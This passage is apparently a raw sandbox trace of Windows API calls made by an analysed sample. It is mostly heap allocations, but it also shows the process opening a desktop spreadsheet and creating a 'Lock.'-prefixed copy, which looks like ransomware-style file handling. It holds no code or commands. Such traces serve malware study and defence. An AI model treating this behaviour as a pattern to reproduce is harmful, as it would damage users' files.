[0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0160.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0160.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0160.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0160.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.723] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0160.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0160.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0160.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0160.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0160.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0160.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0160.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0160.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0160.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0160.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0160.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0160.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0160.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0160.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0160.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/5EdvDyyb.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5edvdyyb.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0160.732] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.732] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0160.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0160.732] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0160.732] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.732] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0160.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0160.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0160.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0160.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0160.732] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.5EdvDyyb.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.5edvdyyb.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0160.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0160.733] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0160.733] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.733] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0160.733] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0160.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0160.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0160.734] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0160.734] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x97c, lpOverlapped=0x0) returned 1 [0160.735] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0160.735] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0160.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0160.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0160.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0160.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0160.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x97c) returned 0x2416270 [0160.735] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0160.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0160.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0160.735] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0160.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0160.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0160.736] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0160.736] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0160.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0160.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.736] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0160.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0160.736] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.737] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0160.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0160.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0160.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0160.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0160.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.737] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.738] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) 